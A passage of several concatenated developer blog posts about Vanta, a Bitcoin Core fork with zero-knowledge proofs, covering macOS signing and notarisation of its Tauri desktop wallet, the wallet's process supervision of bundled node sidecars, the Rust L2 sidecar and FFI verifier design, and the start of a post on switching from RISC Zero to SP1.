This is the step I had to discover. `notarytool submit` uploads the DMG, Apple's notary service runs its scan, and `stapler staple` attaches the resulting ticket to the file so Gatekeeper can verify offline.

**Step 7: verify everything.**

```bash
codesign --verify --deep --strict --verbose=2 "$APP_PATH"
spctl -a -t open --context context:primary-signature -v "$DMG_PATH"
xcrun stapler validate "$APP_PATH"
xcrun stapler validate "$DMG_PATH"
```

If any of these fail I want to know *before* the DMG ships, not after a user tries to install it. The verification is fast — under a second on a recent Mac — so it's free to run as a final step.

## The libconsensus link order issue

The 2026-04-13 commit `eff33f7a chain+build: mined genesis nonce + libconsensus links FFI` was the fix for a problem that took an embarrassing amount of time. The C++ build's link order didn't include the FFI verifier static library (`libvanta_verifier.a`) before the Bitcoin libconsensus shared library, with the result that consensus-time calls to `vanta_verify_and_decode` came back as undefined symbols at runtime.

The fix was a `Makefile.am` patch making the linker order explicit:

```
src_bitcoind_LDADD = libvanta_verifier.a $(LIBBITCOIN_CONSENSUS) ...
```

The lesson: when you're FFI-binding a Rust static lib into a C++ autotools project, `LDADD` order is load-bearing. The static lib has to come *before* the shared lib that depends on it, or the linker won't resolve symbols. This is one of those things autotools makes more painful than it should be; in cmake you'd never trip on it.

## The `share/pixmaps` straggler

A bunch of the macOS-build pain wasn't actual build pain; it was rebrand pain. The Bitcoin Core stock build copies icons from `share/pixmaps/bitcoin*.{png,xpm,ico}` into the bundle. Those files still showed Bitcoin's logo even after the chain rebrand, because the icon files weren't `git mv`'d during the zera→vanta rebrand.

From [`CLAUDE.md`](https://github.com/Dax911/vanta/blob/main/CLAUDE.md):

> Bitcoin Core stock icons in `share/pixmaps/bitcoin*.{png,xpm,ico}` still show Bitcoin logo; `src/qt/res/` Qt resources also unrebranded. Qt wallet rebrand is secondary.

We don't ship `vanta-qt` so this is a cosmetic-only issue, but it's the kind of thing an external auditor will flag and rightly so. **TODO: Dax confirm we ship the icon rename in the next pass.**

## Why ship a Mac binary at all

A reasonable challenge: if Vanta is meant to be operator-driven and most operators run Linux servers, why spend this much effort on Mac packaging?

The answer is that *desktop* runs on Mac. Servers run Linux; that's the `vantad` people deploy with systemd. But the wallet — the thing a person actually opens to send a transaction — needs to feel native on the platform the user has. In 2026 that's Mac for half my user base, Linux for the other half (with a long tail of Windows, which we ship via the `bd7d6299` MSI build).

A privacy-chain wallet that only works on Linux is a wallet that's only used by people who already agree with you. The Mac story is the bridge to *normal users*.

## What I would do differently

1. **Codesign-by-default in the Rust build.** I have my Apple Developer creds in `.env.local` and the release script reads them. If I'm doing a quick dev build I sometimes forget to enable signing, and then the resulting binary won't load on a fresh macOS sandbox. Default-on signing for any release build, opt-out for dev builds, would be safer.
2. **Universal binary instead of two builds.** Right now I build aarch64 and x86_64 separately and ship two DMGs. `lipo` can produce a universal binary that runs on both. Tauri 2.x supports it. On the list.
3. **Reproducible builds.** Bitcoin Core has a [Guix-based reproducible build setup](https://github.com/Dax911/vanta/blob/main/doc/guix.md) that produces byte-identical binaries on any host with the right toolchain. I haven't ported that to the Vanta build because it'd require pulling vanta-node into the Guix manifest. Important for downstream trust; not blocking for a first release.

## Further reading

- [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) — the script this post narrates
- [`vanta-desktop/src-tauri/tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) — the bundle config
- [`doc/build-osx.md`](https://github.com/Dax911/vanta/blob/main/doc/build-osx.md) — the upstream Bitcoin Core macOS build doc
- [`doc/guix.md`](https://github.com/Dax911/vanta/blob/main/doc/guix.md) — reproducible-build path I haven't taken yet
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the app this build produces
- [Apple's notarytool docs](https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution) — the notarisation contract


---

# Vanta Desktop: a Tauri wallet that ships its own full node

Canonical: https://blog.skill-issue.dev/blog/vanta_desktop_tauri_wallet/
Description: Most desktop wallets are thin RPC clients that talk to somebody else's node. The Vanta desktop app spawns vantad and the L2 sidecar as Tauri sidecar binaries, owns their PIDs, and adopts orphans on restart. Here is how that came together.
Published: 2026-04-13T21:39:27.000Z
Tags: vanta, tauri, rust, desktop, wallet, sidecar


The user-facing pitch for Vanta is short: open the wallet, click send, watch a private transaction settle on a chain you can verify yourself. The version of that pitch that's actually true requires three processes: a C++ Bitcoin Core fork (`vantad`), a Rust L2 sidecar (`vanta-node`), and a UI. Most "desktop wallets" in 2026 ship the UI and trust someone else for the other two. We didn't want to ship a wallet like that, and the answer turned out to be Tauri.

This post is a tour of [`vanta/vanta-desktop`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop) — the Tauri 2.x app that bundles `vantad` and `vanta-node` as sidecars, runs them under PID supervision in a Rust host, and exposes the resulting capability to a React frontend through `#[tauri::command]` IPC.

Sister reads: [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) is the chain itself, and [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) is the deeper dive on the L2 daemon.

## Why Tauri at all

I spent an unreasonable number of hours on this question. The candidates were Electron, Tauri, native (Swift / Cocoa for Mac, GTK or Qt elsewhere), and a Wails-style Go-with-WebView setup. The constraints:

1. The wallet has to ship a **full node binary**. Not link to it — *ship* it as an external file inside the app bundle. That binary is ~25 MB on macOS aarch64.
2. The node has to **run as a child process** of the app, with the app owning its PID and capable of cleanup on quit.
3. The UI is React because the [web wallet UI](https://github.com/Dax911/vanta/tree/main/wallet-ui) already existed and I wasn't rewriting it.
4. The signing path uses Apple's Developer ID program. The bundle has to be signed and notarised, including the sidecars.

Electron was out because the bundle bloat (Chromium ~300 MB) plus the historical Electron-IPC-as-XSS attack surface was a non-starter for a wallet. Native Mac was out because we ship Linux too. Wails was tempting but the sidecar story for non-Go binaries is awkward.

Tauri 2.x ticked every box: small bundle (the WebView is OS-provided), sidecars are first-class via the [`externalBin` field](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json), the IPC contract is generated from `#[tauri::command]` Rust functions, and the host process is a normal Rust program where I can do `std::process::Command::new(...)` exactly the way I'd do in any CLI.

The `tauri.conf.json` declares the sidecars verbatim:

```json
"externalBin": [
  "binaries/vantad",
  "binaries/vanta-node",
  "binaries/vanta-cli"
]
```

Tauri's bundler will copy `binaries/vantad-aarch64-apple-darwin` (note the target-triple suffix it requires) into the `.app`'s `Contents/MacOS/` directory and code-sign it with the same identity as the host binary. From the Rust side I get a path I can spawn against. Done.

## The sidecar inventory

There are three sidecar binaries and they have different jobs.

`vantad` is the C++ Bitcoin Core fork. It's the consensus node — it runs the SHA-256 PoW mainnet, validates blocks, holds the L1 UTXO set, exposes JSON-RPC on a port. From the desktop app's point of view it is the ground truth for "what does the chain say."

`vanta-node` is the Rust L2 sidecar. It indexes commitments and nullifiers from L1 OP_RETURN anchors, maintains the SMT, and exposes a REST API. The shielded balance, the SMT root, the nullifier set — that's all here. The desktop app talks to it on a separate port.

`vanta-cli` is the C++ command-line client. It's there for power users and debugging. The wallet doesn't shell out to it for anything load-bearing, but it's bundled because if you have `vantad` you almost always want `vanta-cli` too.

The sidecar build script is short and readable — [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) just searches well-known paths, copies the binaries into `src-tauri/binaries/`, and renames them with the target-triple suffix Tauri's bundler expects. The release pipeline ([`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh)) builds `vantad` and `vanta-node` from source first, then runs `pnpm tauri build`, then notarises the resulting `.dmg` separately because Tauri 2.x notarises the `.app` but not the DMG wrapper.

## The PID supervisor

Once you've decided to ship a binary, you've inherited a job: babysit its process. The supervisor lives in [`src-tauri/src/node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) and the centerpiece is the `NodeManager` struct.

```rust
pub struct NodeManager {
    l1_process: Option<Child>,
    l2_process: Option<Child>,
    l1_adopted: bool,
    l2_adopted: bool,
    l1_bin: Option<PathBuf>,
    l2_bin: Option<PathBuf>,
    pub l1_logs: LogBuffer,
    pub l2_logs: LogBuffer,
    app_handle: Option<tauri::AppHandle>,
}
```

A few things in here that took longer than they should have to get right.

**Adoption.** The desktop app uses dedicated ports — `19332` for L1 RPC, `19333` for P2P, `19380` for the L2 API — so it never collides with a standalone `vantad` running elsewhere on the same machine. But it *does* collide with itself if a previous run died ungracefully. So `start_l1` first probes the port: if something is listening *and* it answers `getblockchaininfo` correctly, we adopt it (return PID 0 as a sentinel). If something is listening but not responsive, we kill the orphan with `lsof -ti :PORT | xargs kill` and respawn. If the port is free, we spawn fresh.

This logic is not optional. The first version of this code didn't have it and every quit-and-relaunch produced a "port in use, vantad failed to start" error that confused absolutely everybody.

**Pipe draining.** A C++ process logging to stdout will eventually fill the OS's 64 KB pipe buffer if nobody reads it, then block on the next `write()`. `vantad` with `-printtoconsole` is a heavy logger. The host has to drain the pipes constantly. The function that does it is small enough to quote whole:

```rust
fn drain_pipe<R: std::io::Read + Send + 'static>(
    pipe: R,
    label: &'static str,
    log_buf: LogBuffer,
    event_emitter: Option<tauri::AppHandle>,
) {
    std::thread::spawn(move || {
        let reader = std::io::BufReader::new(pipe);
        for line in reader.lines() {
            match line {
                Ok(text) => {
                    tracing::debug!("[{label}] {text}");
                    log_buf.push(text.clone());
                    if let Some(ref app) = event_emitter {
                        let _ = app.emit("node-log", serde_json::json!({
                            "source": label,
                            "line": text,
                        }));
                    }
                }
                Err(e) => {
                    tracing::debug!("[{label}] pipe read error: {e}");
                    break;
                }
            }
        }
    });
}
```

Each line goes three places: the Rust tracing log, a 200-line ring buffer that the frontend can pull on demand (`status` returns the last 20), and a Tauri event so the frontend can render a live console. This last one is the thing that turned a black-box "is the node alive" indicator into a full-screen log view that's actually useful to debug failures.

**Auto-config.** Before `vantad` starts, the host writes a fresh `vanta.conf` into the desktop-isolated data dir at `{home}/.vanta-desktop/l1/vanta.conf`. The config is hardcoded for the desktop's port plan, points at the seed nodes, sets `txindex=1` so the L2 watcher can find historic OP_RETURN anchors, and disables Bitcoin-style DNS seeding (we're not on Bitcoin's network). The user never sees this file unless they go looking.

## Sequenced startup

The first wallet release would just spawn both nodes and hope. The result was a race condition: `vanta-node` would come up before `vantad`'s RPC was reachable, fail its first poll, and die. We added [`sequenced_startup`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) so the L2 only starts after the L1's RPC has actually answered.

```
Stage 1: Start L1 (may adopt)
Stage 2: Wait for L1 RPC up to 60s, exponential backoff
Stage 3: Create / load default wallet via RPC
Stage 4: Start L2 (now that L1 is confirmed reachable)
Stage 5: emit "ready" event to frontend
```

Each stage emits a Tauri event the frontend subscribes to. The first-launch UX is a five-stage progress meter that goes "spawning vantad… RPC ready… wallet loaded… spawning vanta-node… ready." On a warm cache that whole flow takes about 4 seconds. On a cold first launch it's closer to 12. Better than 12 silent seconds with a spinner.

If anything fails, the failure stage gets the last 15 lines of stdout/stderr appended into the error message. The user sees not "vantad failed" but "vantad exited during startup. Last output: …". That diagnostic surface alone has paid for itself ten times over in support tickets I didn't have to chase.

## The IPC contract

The frontend never speaks JSON-RPC to `vantad` directly. Every UI action goes through a `#[tauri::command]` defined in [`commands.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/commands.rs). The `lib.rs` registration is a single `invoke_handler` macro:

```rust
.invoke_handler(tauri::generate_handler![
    commands::wallet_init,
    commands::wallet_info,
    commands::wallet_balance,
    commands::wallet_notes,
    commands::wallet_send,
    commands::wallet_sync,
    commands::wallet_pubkey,
    commands::rpc_call,
    commands::start_nodes,
    commands::node_start_l1,
    commands::node_start_l2,
    commands::node_stop_l1,
    commands::node_stop_l2,
    commands::node_status,
    commands::l2_status,
    commands::swap_initiate,
    commands::swap_participate,
    commands::swap_list,
    commands::swap_inspect,
    commands::get_settings,
    commands::set_settings,
])
```

Every command is a typed Rust function that Tauri generates a TypeScript stub for. The frontend imports `invoke('wallet_balance')` and gets back a typed JSON response. There's no HTTP server inside the app, no `localhost:8085`, no possibility of a malicious website hitting the wallet's API.

This is a privacy property as well as a security one. A web wallet that runs on `localhost:8085` is reachable by any browser tab. A Tauri wallet that uses the IPC bridge isn't. The wallet's `csp` is `null` in `tauri.conf.json` only because the frontend doesn't load anything cross-origin — every "fetch" is actually an `invoke`.

## Linux/NVIDIA, the cursed stanza

Two lines in [`lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) earned a comment longer than they are:

```rust
#[cfg(target_os = "linux")]
{
    if std::env::var("WEBKIT_DISABLE_DMABUF_RENDERER").is_err() {
        std::env::set_var("WEBKIT_DISABLE_DMABUF_RENDERER", "1");
    }
}
```

webkit2gtk on NVIDIA's proprietary driver under Wayland tries to use a DMA-BUF renderer path that crashes with "Error 71 (Protocol error) dispatching to Wayland display." Disabling it forces software compositing, which is fine. This one bug ate a weekend before the workaround landed.

The wider lesson: when you ship a desktop app you become a desktop developer, and "desktop developer" means "the OS will surprise you in ways the web never has." Budget for it.

## macOS sign + notarise

Apple's developer pipeline for distributing an app outside the Mac App Store is its own genre of misery, but it's a solved misery. The [`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) script automates the whole thing:

1. Build `vantad` (C++) and `vanta-node` (Rust release) from source.
2. Copy them into `src-tauri/binaries/` with target-triple suffixes.
3. Load `APPLE_ID` / `APPLE_PASSWORD` / `APPLE_TEAM_ID` from `.env.local`.
4. Run `pnpm tauri build`. Tauri auto-signs the `.app` with the Developer ID identity declared in `tauri.conf.json` (`Developer ID Application: Hayden Porter-Aylor (9HD4Q82U58)`).
5. Submit the `.dmg` separately to `xcrun notarytool`.
6. Staple the resulting ticket with `xcrun stapler staple`.
7. Verify everything with `codesign --verify --deep --strict --verbose=2` and `spctl -a -t open -v`.

The reason step 5 exists at all is that Tauri 2.x notarises the `.app` but not the `.dmg` that wraps it. Gatekeeper checks the outer file when a user downloads the DMG, so we have to submit the wrapper separately. This is documented in approximately zero places. I figured it out by attempting to install my own DMG on a clean VM and watching Gatekeeper refuse it. Two hours of head-scratching later, the staple step landed.

The end state: a user downloads `Vanta Wallet.dmg`, double-clicks it, drags the app to Applications, and Gatekeeper signs off without a "this came from the internet" prompt. That's the outcome that matters — and it would not be possible without the Tauri sidecar pattern signing the inner binaries with the same identity.

## What I changed my mind about

I started the desktop project genuinely planning to ship the existing `wallet-ui` as a webpage and tell people to run a `vantad` themselves. The friction of that — every user a node operator on day one — was always going to be a non-starter for everybody but engineers like me. The desktop app is the answer to "I want my mom to be able to use this," and Tauri's sidecar feature is what made the answer cheap enough to ship.

If you're building a wallet for a privacy chain in 2026 and you skip the embedded full-node story, you are shipping an indexed light client and calling it a wallet. That's fine for some products. It is not fine for this one. The whole pitch of Vanta is *you don't have to trust an indexer.* If the wallet trusts an indexer the pitch evaporates.

## TODO: Dax confirm

- The signing identity hash `474F624D8F3783B4D607CFF2331AD4C6CC26A1B5` and team ID `9HD4Q82U58` are real Apple Developer values. They're committed to the repo because the cert itself is private and the public values aren't sensitive — but worth a sanity check before publishing a wider distribution.
- Windows MSI build was added in [commit `bd7d6299`](https://github.com/Dax911/vanta/commit/bd7d6299) on 2026-04-14. I'm describing the macOS-canonical pipeline because it's the one I run end-to-end; the Windows path may have evolved since I last touched it.

## Further reading

- [`vanta-desktop/src-tauri`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop/src-tauri) — the Tauri host, including the node supervisor
- [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) — sign + notarise + verify pipeline
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — what `vanta-node` is doing on the other side of these IPC calls
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — what's running inside `vantad`
- [Tauri 2.x docs on sidecars](https://tauri.app/v2/develop/sidecar/) — the framework feature this is all built on
- [Apple's notarytool docs](https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution) — the macOS distribution pipeline


---

# The vanta sidecar: how a Rust ZK indexer talks to a C++ Bitcoin node

Canonical: https://blog.skill-issue.dev/blog/vanta_sidecar_architecture/
Description: vantad is C++. The ZK index is Rust. They cooperate over RPC and a REST API, with the C++ verifier linked statically through libvanta_verifier.a. Here is the audit-surface trade we made and what the sidecar actually does.
Published: 2026-04-13T17:46:02.000Z
Tags: vanta, rust, sidecar, sp1, zk, bitcoin, ffi


A 1-minute-block Bitcoin Core fork with ZK proofs at consensus has a problem the README doesn't volunteer: you need the validator to *check the proofs*, but you don't want to write the proof system in C++. Vanta's answer is a hybrid. The C++ consensus engine calls a Rust verifier statically linked as `libvanta_verifier.a`. The L2 indexing, the SMT, the encrypted-note delivery, and the proof-generation hot path all live in a *separate* Rust process — `vanta-node` — that talks to `vantad` over JSON-RPC and to wallets over REST.

Two things share the name "sidecar" in this codebase and I want to disambiguate them up front:

1. The **FFI verifier** (`vanta-verifier-ffi` → `libvanta_verifier.a`) is *linked into vantad*. It runs in-process. It's what answers "does this SP1 proof verify" inside `src/script/interpreter.cpp`.
2. The **L2 sidecar** (`vanta-node`) is a *separate daemon*. It indexes commitments, holds the SMT, distributes encrypted notes, and serves a REST API to wallets. It does not participate in consensus.

This post is about both, because the architecture only makes sense when you see why one is in-process and the other isn't.

## The audit-surface trade

Bitcoin Core has 280k+ lines of C++ that have been read by more eyes than any other consensus codebase on Earth. Adding a Rust dependency to that build is a non-trivial ask of a future Bitcoin-Core-style review. We made the call up-front: a *minimal* Rust footprint inside `vantad`, exposed through a hand-written C ABI, with everything else in a separate process.

The minimal footprint is `libvanta_verifier.a`. From the [zkVM engineering paper](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md), the contract:

> The bridge between the ZK proof world and the consensus world is a 440-byte C-compatible structure called `VantaJournal`, declared in `src/vanta/verifier.h`:
>
> ```c
> typedef struct {
>     uint8_t  smt_root[32];
>     uint32_t input_commitment_count;
>     uint8_t  input_commitments[VANTA_MAX_SLOTS][32];
>     uint32_t nullifier_count;
>     uint8_t  nullifiers[VANTA_MAX_SLOTS][32];
>     uint32_t commitment_count;
>     uint8_t  commitments[VANTA_MAX_SLOTS][32];
>     int64_t  value_balance;
> } VantaJournal;
> ```

The C++ never deserializes an SP1 proof. It calls `vanta_verify_and_decode()` with a byte slice; the function returns a boolean and populates the `VantaJournal`. From there the consensus engine looks at 32-byte hashes and a signed `i64` and makes its decisions on bytes alone.

This is a deliberate cryptographic-engineering posture. The proof system can change underneath the FFI without changing the FFI. SP1 today, Halo 2 someday, whatever-comes-after-that the day after that — the C++ doesn't have to know.

## Why isn't the L2 logic in `vantad` too?

This was the design conversation that took the longest to resolve.

Option A was to put everything in-process. One binary, one supervised PID, fewer moving parts. The problem: the L2 index isn't *consensus*. It's an indexed view of commitments, an SMT, and a REST API. Bundling that into `vantad` would mean every Bitcoin-Core-style operator who wanted to run the chain would inherit an HTTP server, an SQLite-backed index, and an iroh-based gossip layer. That's a footprint expansion that buys nothing for the consensus path.

Option B was a separate process with a clean network boundary. `vanta-node` talks *down* to `vantad` over standard JSON-RPC (the same `getblock`/`getrawtransaction` an explorer would use) and *up* to wallets over REST and iroh gossip. The footprint cost lives in the operator's discretion: if you don't want the L2 services, don't run `vanta-node`.

We went with B and I don't regret it. The trade-off is that the L2 sidecar is a piece of operational machinery to keep alive. The desktop app handles that automatically (see [vanta-desktop](/blog/vanta_desktop_tauri_wallet/)); a server operator handles it the way they handle any daemon.

## What `vanta-node` actually does

[`main.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/main.rs) is a four-task tokio program:

```rust
let watcher_handle = tokio::spawn(async move {
    if let Err(e) = l1_watcher::run(watcher_config, watcher_state).await {
        tracing::error!("L1 watcher error: {e}");
    }
});

let gossip_handle_opt = match gossip::start(state.clone(), config.bootstrap_peers.clone()).await {
    Ok((handle, router)) => { ... }
    Err(e) => {
        tracing::warn!("Failed to start gossip (continuing without P2P): {e}");
        None
    }
};

let api_handle = tokio::spawn(async move {
    if let Err(e) = api::serve(api_state, &api_listen).await {
        tracing::error!("API server error: {e}");
    }
});

let save_handle = tokio::spawn(async move {
    let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(10));
    loop {
        interval.tick().await;
        if let Err(e) = save_state.save() {
            tracing::warn!("Failed to save state: {e}");
        }
    }
});
```

Four jobs: watch L1 for new blocks, gossip with peers over iroh, serve the REST API, and snapshot state to disk every 10 seconds. Each tokio task runs against a shared `L2State` that's `Arc`-cloned across them.

The **L1 watcher** polls `vantad`'s RPC every 2 seconds (configurable via `VANTA_POLL_MS`). For each new block it scans every transaction's outputs for the `OP_RETURN` anchor format we use to publish commitments and nullifiers — the byte sequence is `OP_RETURN 0xbb 0x00 <32-byte commitment>`, defined in the [pool's stratum server](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py) where I wrote it in Python and reused the format on the Rust side. Hits get fed into the SMT.

The **gossip layer** uses [iroh](https://iroh.computer) — pure-Rust, QUIC-based, NAT-traversing — to share encrypted notes between L2 peers. The `bootstrap_peers` come from an env var; the desktop app starts with that empty by default. Iroh's gossip is a per-topic channel and we use one topic per chain (mainnet, regtest). The architecture doc explains the pick:

> **P2P:** iroh.computer — pure Rust, QUIC-based, NAT traversal, gossip protocol, content-addressed blobs. Chosen over libp2p for simplicity, built-in QUIC + NAT hole-punching, and document sync (useful for offline branch-and-merge).

The **REST API** is the thing wallets actually consume. The endpoints I care most about are `/status` (commitment count, nullifier count, SMT root, last block), `/submit` (push new commitments + encrypted notes from the pool or a wallet), `/notes/scan` (trial-decrypt encrypted notes against a wallet's secret key), and `/proofs/recent` (the 500-slot ring buffer of recently-verified proofs the explorer renders).

The **save loop** is 10-second snapshots. The state file is a bincode'd dump of the SMT plus the nullifier set plus the encrypted-note inbox. `Drop` on the `L2State` saves on shutdown too. If the process is killed `-9` you lose at most 10 seconds of work, and the L1 watcher rebuilds the state by re-scanning from the last good height.

## How the wallet uses the sidecar

The desktop wallet uses both `vantad` *and* `vanta-node`. From the wallet's perspective:

- `vantad` is the source of truth for L1 — block heights, transparent UTXOs, transaction broadcast.
- `vanta-node` is the source of truth for L2 — commitments, nullifiers, encrypted notes addressed to me.

When I press "send" on a private transaction in the desktop wallet:

1. The wallet asks `vanta-node` for the current SMT root and the membership proof for the input commitment I'm spending.
2. The wallet generates an SP1 proof locally (or, for low-end machines, against the SP1 proving network) using the membership proof and my secret key as private witness.
3. The wallet builds an L1 transaction that includes the SP1 proof in `witness.stack[0]` and an OP_RETURN anchor with the new commitment.
4. The wallet broadcasts the transaction via `vantad`'s `sendrawtransaction` RPC.
5. `vantad` validates: standard script checks, then `vanta_verify_and_decode()` against the SP1 proof in the witness.
6. After the block is mined, `vanta-node`'s L1 watcher picks up the OP_RETURN anchor and the new commitment lands in the SMT.

The recipient wallet `/submit`s an encrypted-note query to its `vanta-node`, which trial-decrypts using the recipient's secret. If the trial decrypts cleanly, the note is mine.

This is the architecture the [coinbase auto-shield](#) feature also rides on: every miner reward is a witness v2 commitment paying into the miner's shielded address, with the encrypted note pushed to the L2 via the same `/submit` endpoint. From the [pool's stratum server](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py):

```python
def save_shielded_note(height, commitment_hex, randomness_hex, value):
    """Persist mining note and submit encrypted note to L2 for wallet discovery.

    Called ONLY after a winning block is accepted by submitblock — never from
    the per-share job-template path, otherwise the L2 SMT fills up with phantom
    commitments for templates that never won the PoW race.
    """
```

That comment is load-bearing. The first version of the pool submitted the encrypted note on every share — that produced thousands of phantom commitments per block. Submitting only on `submitblock` accept fixes it.

## Failure modes

The sidecar architecture has failure modes the in-process design wouldn't have. They're worth naming.

**`vanta-node` is dead, `vantad` is alive.** The wallet's L1 RPC works fine. The wallet's L2 calls all 503. The desktop app surfaces this as "L2 disconnected" and lets you keep using transparent functionality. Private send is gated behind L2 reachability.

**`vantad` is dead, `vanta-node` is alive.** L1 RPC fails. `vanta-node`'s watcher logs polling failures. The L2 state is frozen at whatever block was last seen. The desktop app surfaces this as "L1 disconnected"; sending is impossible (no broadcast endpoint), but the wallet can still display historic state.

**Both alive but `vanta-node` lost its data dir.** The L1 watcher detects "I've seen no blocks" on startup and re-scans from genesis. On a small chain this is fine. On a large chain this is a known cost of recovery — measured in hours, not days, but not free.

**`vanta-node` is alive but the SMT is corrupted.** This one I worry about. Bincode + Drop-save + 10-second snapshots is a defensible steady state, but a partial write during a crash could in principle produce a non-loading state file. Recovery is "rm the state file, restart, let the watcher rebuild." We have monitoring on the fall-through path. **TODO: Dax confirm we ship cryptographic checksums on the state file.**

## What this isn't

I want to head off two possible misreadings.

**This is not a proof-on-server architecture.** The proof generation happens in the wallet (or, optionally, on a remote SP1 prover the user trusts). `vanta-node` doesn't generate proofs. It distributes encrypted notes and indexes commitments. The only ZK code in `vanta-node` is the verifier path it uses to sanity-check proofs before accepting them into the proof event ring buffer.

**This is not a custodial sidecar.** `vanta-node` never sees secret keys. The encrypted notes are encrypted *to the recipient's pubkey* — `vanta-node` distributes ciphertext. Trial decryption happens client-side in the wallet using the recipient's secret. Lose the secret, lose the funds; lose the L2 sidecar, replay the chain. The cryptographic posture is the same as Zcash sapling notes.

## What I changed my mind about

The original [nullifier-set post](/blog/vanta_l1_nullifier_set/) hinted at this: "The actual ZK proof verification happens **out of process** in the Rust sidecar. The C++ node fires off the proof to a local Unix socket and waits for `ok` or `not ok`." That's how it was originally architected. We changed it.

The Unix-socket sidecar didn't survive contact with the SP1 backend. Spawning a sub-process every block to verify proofs is fine in regtest where blocks are minutes apart; on mainnet at 1-minute blocks with peak-hour transaction volume, the IPC overhead added up to milliseconds per verify, multiplied by every spend in every block. Statically linking `libvanta_verifier.a` into `vantad` brought the verifier into the same address space and the same allocator and dropped the per-verify cost to roughly what an in-Rust call would cost.

The audit-surface concern is real but mitigated by the *minimal* FFI: 440 bytes of struct, two C functions, deterministic output. A fuzzer can hammer that boundary and you'll know if it's broken.

What's *still* out of process is the L2 state — the SMT, the nullifier index, the encrypted-note inbox. That's the thing whose footprint we never want inside `vantad`, and there it's stayed.

## Further reading

- [`vanta/vanta-node`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-node) — the L2 sidecar
- [`vanta/vanta-verifier-ffi`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-verifier-ffi) — the in-process FFI verifier
- [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — the design rationale for the SP1/Plonky3 backend
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain itself
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the binary that supervises both processes
- [iroh.computer](https://iroh.computer) — the QUIC-based P2P stack the gossip layer uses


---

# Why we shipped SP1 instead of RISC Zero

Canonical: https://blog.skill-issue.dev/blog/vanta_sp1_zkvm_circuits/
Description: Vanta's earliest design notes said 'RISC Zero zkVM.' Production ships SP1 + Plonky3. The swap was cheap because the privacy protocol is independent of the prover. Here is why we moved, what stayed the same, and what the FFI verifier looks like.
Published: 2026-04-15T23:15:13.000Z
Tags: vanta, sp1, risc-zero, zkvm, plonky3, rust


In the original [Vanta L1 post](/blog/vanta_zk_privacy_l1/) I wrote:

> The ZK layer is in the `vanta/` subtree, written in Rust against [RISC Zero's zkVM](https://www.risczero.com), running entirely outside the C++ core.

That sentence was true when I wrote it. It is no longer true. Production Vanta ships SP1 — Succinct Labs' zkVM — with Plonky3 as the proof backend. RISC Zero was the early prototype. The migration happened before mainnet and has been the production prover for every consensus-critical proof since.

This post is the *why* of that change, the architectural choice that made the migration cheap, and what the verifier surface inside `vantad` actually looks like. The design rationale is also documented in [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md), which is the canonical version. This post is the practitioner-flavored version: what I had to change, what I didn't, and what I'd warn the next person about.

## The abstraction that made the swap cheap

The reason RISC Zero → SP1 was a code refactor and not an architectural rewrite is that the ZK code in Vanta is split into four layers and only *two* of them touch the zkVM SDK at all.

From the engineering paper:

> 1. **Core logic** (`vanta-core`): Pure Rust library containing the transfer validation function, domain-separated commitment construction, nullifier derivation, SMT membership proofs, and conservation law checks. This library has no dependency on any zkVM. It compiles to native x86, to ARM, and to RISC-V. It is the same code whether it runs inside a zkVM guest, inside a test harness, or on a developer's laptop.
>
> 2. **Guest program** (`vanta-circuits/methods/guest/`): A thin wrapper that reads private inputs from the zkVM host, calls `validate_transfer()` from `vanta-core`, and commits the public outputs (`TransferPublicInputs`: `smt_root`, `input_commitments`, `nullifiers`, `commitments`, `value_balance`) to the journal. The guest program is a few dozen lines of Rust. Its only zkVM-specific code is the I/O calls (`sp1_zkvm::io::read()` and `sp1_zkvm::io::commit()`).
>
> 3. **Host prover** (`vanta-circuits/src/prover.rs`): The component that sets up the proving environment, feeds private inputs to the guest, and invokes SP1 to generate a compressed Plonky3 proof.
>
> 4. **FFI verifier** (`vanta-verifier-ffi`): A Rust static library compiled to `libvanta_verifier.a` and linked directly into `vantad`.

The split means that *the cryptographic protocol* — commitment scheme, nullifier scheme, conservation law, SMT membership proof verification — lives in `vanta-core` and has no zkVM dependency. The same Rust source compiles to:

- native x86_64 for unit tests on my laptop
- RISC-V for either zkVM's guest target
- ARM for the iOS wallet (eventually)

